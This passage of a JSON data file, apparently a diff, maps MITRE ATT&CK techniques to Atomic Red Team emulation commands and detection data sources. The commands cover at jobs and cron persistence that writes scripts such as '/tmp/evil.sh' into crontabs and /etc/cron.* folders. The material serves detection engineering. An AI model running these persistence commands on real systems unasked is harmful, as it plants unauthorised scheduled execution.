[ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1053.001", + "command_list": [ + "echo \"#{at_command}\" | at now + 1 minute\n", + "echo \"echo Hello from Atomic Red Team\" | at #{time_spec}\n" + ], + "commands": [ + { + "command": "echo \"#{at_command}\" | at now + 1 minute\n", + "source": "atomics/T1053.001/T1053.001.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: At (Linux)" + }, + { + "command": "echo \"echo Hello from Atomic Red Team\" | at #{time_spec}\n", + "source": "atomics/T1053.001/T1053.001.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: At (Linux)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.001", + "display_name": "Scheduled Task/Job: At (Linux)", + "atomic_tests": [ + { + "name": "At - Schedule a job", + "auto_generated_guid": "7266d898-ac82-4ec0-97c7-436075d0d08e", + "description": "This test submits a command to be run in the future by the `at` daemon.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "time_spec": { + "description": "Time specification of when the command should run", + "type": "String", + "default": "now + 1 minute" + }, + "at_command": { + "description": "The command to be run", + "type": "String", + "default": "echo Hello from Atomic Red Team" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "The `at` and `atd` executables must exist in the PATH\n", + "prereq_command": "which at && which atd\n", + "get_prereq_command": "echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'\n" + }, + { + "description": "The `atd` daemon must be running\n", + "prereq_command": "systemctl status atd || service atd status\n", + "get_prereq_command": "echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo \"#{at_command}\" | at #{time_spec}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.002", + "command_list": [ + "at 13:20 /interactive cmd\n" + ], + "commands": [ + { + "command": "at 13:20 /interactive cmd\n", + "source": "atomics/T1053.002/T1053.002.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: At (Windows)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.002", + "display_name": "Scheduled Task/Job: At (Windows)", + "atomic_tests": [ + { + "name": "At.exe Scheduled task", + "auto_generated_guid": "4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8", + "description": "Executes cmd.exe\nNote: deprecated in Windows 8+\n\nUpon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "at 13:20 /interactive cmd\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.003", + "command_list": [ + "crontab -l > /tmp/notevil\necho \"* * * * * /tmp/evil.sh\" > #{tmp_cron} && crontab #{tmp_cron}\n", + "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > /tmp/persistevil && crontab /tmp/persistevil\n", + "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.daily/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.hourly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.monthly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.weekly/#{cron_script_name}\n", + "echo \"#{command}\" > /etc/cron.daily/persistevil\necho \"#{command}\" > /etc/cron.hourly/persistevil\necho \"#{command}\" > /etc/cron.monthly/persistevil\necho \"#{command}\" > /etc/cron.weekly/persistevil\n", + "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" >> /var/spool/cron/crontabs/#{cron_script_name}\n", + "echo \"#{command}\" >> /var/spool/cron/crontabs/persistevil\n" + ], + "commands": [ + { + "command": "crontab -l > /tmp/notevil\necho \"* * * * * /tmp/evil.sh\" > #{tmp_cron} && crontab #{tmp_cron}\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > /tmp/persistevil && crontab /tmp/persistevil\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.daily/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.hourly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.monthly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.weekly/#{cron_script_name}\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"#{command}\" > /etc/cron.daily/persistevil\necho \"#{command}\" > /etc/cron.hourly/persistevil\necho \"#{command}\" > /etc/cron.monthly/persistevil\necho \"#{command}\" > /etc/cron.weekly/persistevil\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" >> /var/spool/cron/crontabs/#{cron_script_name}\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"#{command}\" >> /var/spool/cron/crontabs/persistevil\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.003", + "display_name": "Scheduled Task/Job: Cron", + "atomic_tests": [ + { + "name": "Cron - Replace crontab with referenced file", + "auto_generated_guid": "435057fb-74b1-410e-9403-d81baf194f75", + "description": "This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "String", + "default": "/tmp/evil.sh" + }, + "tmp_cron": { + "description": "Temporary reference file to hold evil cron schedule", + "type": "Path", + "default": "/tmp/persistevil" + } + }, + "executor": { + "name": "bash", + "command": "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}\n", + "cleanup_command": "crontab /tmp/notevil\n" + } + }, + { + "name": "Cron - Add script to all cron subfolders", + "auto_generated_guid": "b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0", + "description": "This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "String", + "default": "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" + }, + "cron_script_name": { + "description": "Name of file to store in cron folder", + "type": "String", + "default": "persistevil" + } + }, + "executor": { + "elevation_required": true, + "name": "bash", + "command": "echo \"#{command}\" > /etc/cron.daily/#{cron_script_name}\necho \"#{command}\" > /etc/cron.hourly/#{cron_script_name}\necho \"#{command}\" > /etc/cron.monthly/#{cron_script_name}\necho \"#{command}\" > /etc/cron.weekly/#{cron_script_name}\n", + "cleanup_command": "rm /etc/cron.daily/#{cron_script_name}\nrm /etc/cron.hourly/#{cron_script_name}\nrm /etc/cron.monthly/#{cron_script_name}\nrm /etc/cron.weekly/#{cron_script_name}\n" + } + }, + { + "name": "Cron - Add script to /var/spool/cron/crontabs/ folder", + "auto_generated_guid": "2d943c18-e74a-44bf-936f-25ade6cccab4", + "description": "This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "String", + "default": "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" + }, + "cron_script_name": { + "description": "Name of file to store in /var/spool/cron/crontabs folder", + "type": "String", + "default": "persistevil" + } + }, + "executor": { + "elevation_required": true, + "name": "bash", + "command": "echo \"#{command}\" >> /var/spool/cron/crontabs/#{cron_script_name}\n", + "cleanup_command": "rm /var/spool/cron/crontabs/#{cron_script_name}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + 